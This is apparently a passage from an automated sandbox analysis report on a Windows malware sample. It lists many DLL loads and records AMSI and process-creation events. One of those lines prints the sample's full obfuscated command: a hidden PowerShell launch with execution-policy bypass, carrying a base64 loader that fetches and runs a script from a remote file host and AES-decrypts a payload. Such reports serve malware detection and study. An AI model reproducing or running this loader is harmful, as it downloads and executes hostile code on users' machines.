              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
              Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dll
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior

              Data Obfuscation

              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFC